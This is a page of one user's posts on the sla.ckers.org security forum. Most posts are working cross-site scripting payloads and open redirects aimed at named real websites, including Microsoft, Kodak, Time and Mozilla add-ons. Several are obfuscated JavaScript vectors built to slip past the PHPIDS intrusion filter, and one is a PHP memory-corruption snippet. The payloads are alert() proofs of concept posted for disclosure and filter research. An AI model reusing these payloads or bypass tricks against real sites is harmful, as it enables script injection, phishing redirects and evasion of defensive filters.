Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 38
5 years ago
C1c4Tr1Z
@thornmaker: Because I saw that on p42.us, and I wanted to change it based on that vector, trying to bypass PHPIDS. (but I couldn't)
Forum: Projects
5 years ago
C1c4Tr1Z
@.mario: Yeah, i think that was the problem, because i was testing this vector from p42.us: a=alert,a(0) I was playing with something like this, but his impact is 35.:D a=/aalertt/;/a(.*)t/.test(a),a=eval(RegExp.$1);a(0) bye!
Forum: Projects
5 years ago
C1c4Tr1Z
I don't know if this is the right place to post it, but I've found a vector that PHPIDS didn't recognize it: a>>/al/+/ert/|a(0) Thanks! EDIT: This vector doesn't seems to work! My browser is crazy :).
Forum: Projects
5 years ago
C1c4Tr1Z
Browser Security Handbook http://code.google.com/p/browsersec/ Google doctype's Web Security section http://code.google.com/p/doctype/wiki/ArticlesXSS
Forum: Obfuscation
5 years ago
C1c4Tr1Z
concat() also works: ({}=[].concat)()[0] == window
Forum: XSS Info
5 years ago
C1c4Tr1Z
Well, at least it's secure..
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
jojo! nice magicmac. MAD got xssed: http://www.dccomics.com/mad/popup_marginal.php?m=weather_shop_talk%22;alert(/XSS/.source);%22
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
http://www.truste.org/ivalidate.php?url=http://www.verisign.com/&sealid=101" onmouseover=alert('XSS') " We love sarcasm.
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
http://w2.hidemyass.com/index.php?q=aHR0cDovL3d3dy5nb29nbGUuY29tLmFyLz9xPVwiIG9ubW91c2VvdmVyPWFsZXJ0KC9DMWM0VHIxWi8uc291cmNlKT4=
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
http://shop.starwars.com/catalog/product.xml?product_id=1223186;category_id=100750&rid=SWHP3PROD%27,%22%22),$=alert,_=%22XSS%22,$(_)// I had to bypass something like this (;|+\(.*\))+ PS: Upss! It's McAfee SECURE!
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
Oh my: http://www.microsoft.com.mk/Default.aspx?tabindex=0&tabid=47&search=<img/src/onerror=alert(/XSS/.source)>
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
http://messagebot.com/cgi-bin/click.cgi?http://sla.ckers.org/forum/
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
And, Kodak: http://www.kodak.com/global/en/service/products/ekn035324.jhtml?pq-path=12998%22;alert(0),foo=%22 http://www.kodak.com/eknec/PageQuerier.jhtml?pq-path=204&pq-locale=es_AR&successURI=%22%3E%3Cimg/src/onerror=%22alert(%27xss @euronymous: http://demodms.hosty.it/index.php?redirection=%22%3E%3Ciframe/src=%22javascript:alert(%27XSS%27)
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
Thanks DoctorDan! I'll read it. I've found this also: http://applesoup.googlepages.com/bypass_filter.txt
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
Thi's is something weird.. hxxps://addons.mozilla.org/en-US/firefox/search?q=%C0%22%20onmouseover=alert(/xss/.source)%20\&cat=all Tested on FF 3.0.3 (UTF-8)
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
@Kyo: mmm... that's weird. Because if you look at the source code, you will see that the syntax it's correct.
Forum: XSS Info
5 years ago
C1c4Tr1Z
FF3 Unix: http://www.time.com/time/searchresults?N=0&Ntk=NoBody&Nty=1&Nr=OR(1=1)&Ntt=%22);%0Aa=alert,a(%22XSS
Forum: XSS Info
5 years ago
C1c4Tr1Z
I think that maybe WebScarab or the Burp suite have more features.
Forum: XSS Info
5 years ago
C1c4Tr1Z
I only have found some XSS but with POST requests. But if you are searching for bugs, there's a nice SQL Injection..
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
I fuzzed the browser with UTF-7 and the only char that seems to give me a valid javascript execution is char 43.
Forum: XSS Info
5 years ago
C1c4Tr1Z
Just more easy functions: with(b={})if((b.c=function(){return'ale'})&&(b.a=function(){return'rt'}))eval(b.c()+b.a())(0); a=/aalertt/;/a(.*)t/.test(a),a=eval(RegExp.$1),a(0) Tell me if one of them doesn't work :S
Forum: XSS Info
5 years ago
C1c4Tr1Z
Maybe just the whitelist, because a blacklist must be updated very often.
Forum: XSS Info
5 years ago
C1c4Tr1Z
Here, realpath() and other functions appears in this advisory of Hardened-PHP: http://www.hardened-php.net/advisory_012004.42.html
Forum: Projects
5 years ago
C1c4Tr1Z
Here are three functions that might like you: realpath() stream_set_write_buffer() is_writable() && is_readable()
Forum: Projects
5 years ago
C1c4Tr1Z
I was thinking in memory allocation or off-by-one exploits. For example: <?php /*PHP 4 < 4.4.5 and PHP 5 < 5.2.1*/ str_replace("A", str_repeat("B", 65535), str_repeat("A", 65538)); ?>
Forum: Projects
5 years ago
C1c4Tr1Z
id Wrote: ------------------------------------------------------- > Ummmmm....they did let him, they just happened to > fix it later. Ohh, sorry.
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
I've found that if you put something like this in the URI with Greasemonkey installed, the addon starts "Fetching user script": {;}.user.js And it seems that makes an infinite loop. Then, in the same tab/window, you write: http://www.foo.com/bar.user.js Greasemonkey recognizes the HTML source as a plugin for this addon, instead sending the normal "Error loading user scr
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
I don't think that Yahoo! has no sense of security and let you inject so easy JS code. :S
Forum: Full Disclosure
5 years ago
C1c4Tr1Z
Here's one, it's very simple but i didn't read it in the thread: <iframe/src=data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==>
Forum: XSS Info
5 years ago
C1c4Tr1Z
Another aol redirection: http://www.aol.com/redir.adp?_e_t=ap&_a_v=2.0&_a_i=100214839x1203415855x1200131198&_url=http://www.xssed.com/
Forum: Full Disclosure
Pages: 12Next
Current Page: 1 of 2